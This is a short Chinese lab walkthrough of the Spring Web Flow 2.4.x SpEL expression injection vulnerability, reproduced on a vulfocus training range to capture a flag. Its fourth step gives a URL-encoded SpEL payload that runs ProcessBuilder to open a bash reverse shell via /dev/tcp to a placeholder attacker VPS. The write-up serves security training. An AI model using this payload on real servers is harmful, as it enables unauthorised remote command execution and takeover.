漏洞详情
Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
影响范围:Spring Web Flow 2.4.0 – 2.4.4
漏洞复现
1、启动vulfocus靶场访问目标地址
2、点击login 使用左侧提供账号密码进行登录
3、内容随便填,然后提交confirm时使用Burp截断数据包
4、构造payload:
&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/VPSIP/VPS监听端口+0>%261")).start()=vulfocus
5、监听成功 获取flag